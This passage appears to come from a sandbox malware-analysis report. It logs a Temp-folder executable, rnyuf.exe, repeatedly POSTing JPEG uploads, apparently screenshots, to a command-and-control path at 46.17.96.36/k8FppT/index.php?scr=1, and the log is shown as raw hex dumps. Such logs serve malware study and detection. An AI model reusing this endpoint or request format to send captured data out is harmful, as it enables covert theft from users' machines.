                                        Aug 29, 2021 22:27:10.294378042 CEST1577OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:10.294553041 CEST1588OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:10.294594049 CEST1589OUTData Raw: 1f c3 56 c5 cb 8f 7a 91 6e bd 68 f6 70 7d 43 da 54 46 69 86 41 fc 26 9a 55 87 50 45 6b 7d a5 0f 55 14 be 64 2d d5 45 3f 63 17 b3 0f 6c fa a3 23 14 95 ae 52 dd bb 51 f6 4b 73 d3 8a 9f 62 fa 31 fb 75 d5 19 34 56 a9 d3 e3 3d 1a a3 3a 61 ec c2 97 b1
                                        Data Ascii: Vznhp}CTFiA&UPEk}Ud-E?cl#RQKsb1u4V=:a{hx4e0KIt)TUijco"2;\KFKJp1J2n%-4!ih%8RSP(.($Zp*Si,ZQIJ*--%8SD;H.(&LShG.(>P!FmsG(s
                                        Aug 29, 2021 22:27:10.294845104 CEST1594OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:10.326399088 CEST1597OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:10.326451063 CEST1600OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:10.326603889 CEST1611OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:10.429145098 CEST1664INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:10 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        50192.168.2.44978846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:32.837137938 CEST6633OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----0906b0bfa15b848264cc97903c8df716
                                        Host: 46.17.96.36
                                        Content-Length: 110651
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:32.837280035 CEST6633OUTData Raw: 2d 2d 2d 2d 2d 2d 30 39 30 36 62 30 62 66 61 31 35 62 38 34 38 32 36 34 63 63 39 37 39 30 33 63 38 64 66 37 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------0906b0bfa15b848264cc97903c8df716Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:32.837452888 CEST6643OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:32.837569952 CEST6646OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:32.869875908 CEST6651OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:32.869909048 CEST6657OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:32.870141983 CEST6666OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:32.870187998 CEST6671OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:32.902416945 CEST6674OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:32.902502060 CEST6679OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:32.902533054 CEST6682OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:27:33.008450031 CEST6744INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        51192.168.2.44978946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:33.304291010 CEST6745OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----db56d3c9a49176ccd92b63c96c9facd8
                                        Host: 46.17.96.36
                                        Content-Length: 109347
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:33.304423094 CEST6745OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 35 36 64 33 63 39 61 34 39 31 37 36 63 63 64 39 32 62 36 33 63 39 36 63 39 66 61 63 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------db56d3c9a49176ccd92b63c96c9facd8Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:33.304610968 CEST6755OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:33.304712057 CEST6758OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:33.337270021 CEST6761OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:33.337316036 CEST6771OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:33.337450027 CEST6778OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:33.338710070 CEST6783OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:33.370011091 CEST6791OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:33.370074034 CEST6810OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:27:33.370096922 CEST6812OUTData Raw: ff 00 0a eb c5 7e 5e 7c cf 9f 6e 3a e7 ca 38 a8 aa b9 92 5e 66 94 e5 ca db 3b 78 8d ff 00 8e ae 25 95 6e e6 b1 d0 23 72 91 88 4e d9 2e 48 ea 49 ec 3f cf 5a 98 78 0b c3 6c cc 96 93 4d 0d d2 7f cb 48 6e 89 91 4f af 7f e5 4e b1 f3 bf e1 56 47 fd 97
                                        Data Ascii: ~^|n:8^f;x%n#rN.HI?ZxlMHnONVG?'gwc9ktBg>c?s]49*rQv:9]H9+Gh+_SAJ\8%_oGZ(1ATY%oW/,98]?R,'{5
                                        Aug 29, 2021 22:27:33.473803043 CEST6855INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:33 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        52192.168.2.44979046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:33.750885010 CEST6856OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----bf8d5a167ee28da00e24b992931fcac0
                                        Host: 46.17.96.36
                                        Content-Length: 108282
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:33.750983000 CEST6856OUTData Raw: 2d 2d 2d 2d 2d 2d 62 66 38 64 35 61 31 36 37 65 65 32 38 64 61 30 30 65 32 34 62 39 39 32 39 33 31 66 63 61 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------bf8d5a167ee28da00e24b992931fcac0Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:33.751148939 CEST6866OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:33.751245975 CEST6868OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:33.787460089 CEST6877OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:33.787883997 CEST6879OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:33.788081884 CEST6889OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:33.788132906 CEST6894OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:33.822530985 CEST6897OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:33.822582006 CEST6904OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:33.822726011 CEST6907OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
                                        Aug 29, 2021 22:27:33.931401968 CEST6965INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:33 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        53192.168.2.44979146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:34.169234991 CEST6966OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9
                                        Host: 46.17.96.36
                                        Content-Length: 107971
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:34.169317007 CEST6966OUTData Raw: 2d 2d 2d 2d 2d 2d 37 32 61 62 31 30 35 61 36 36 39 66 37 63 63 32 66 66 65 38 34 65 62 38 37 37 31 39 34 34 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------72ab105a669f7cc2ffe84eb8771944d9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:34.169481993 CEST6976OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:34.169562101 CEST6979OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
